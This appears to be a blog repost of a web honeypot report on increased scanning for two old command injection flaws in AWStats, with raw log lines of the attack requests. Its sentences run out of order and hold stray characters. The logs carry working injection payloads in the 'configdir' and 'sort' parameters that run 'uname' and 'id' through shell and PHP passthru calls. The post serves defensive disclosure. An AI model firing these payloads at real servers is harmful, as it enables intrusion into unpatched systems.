While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string: If you are running Awstats software, you should make sure you are updated: 47807 : AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Executionīoth of these vulnerability disclosures are old (20) so we are unsure why there is a sudden uptick in scanning.13002 : AWStats configdir Parameter Arbitrary Command Execution.Here are example attacks from the logs: GET /awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /cgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /cgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /cgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /cgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /cgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /cgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /cgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /cgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /scgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /scgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /scgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /scgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /scgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /scgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /scgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /scgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /scripts/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /scripts/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1GET /stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0GET /stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1Īccording to OSVDB - there are two different vulnerabilities that they are probing for: Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |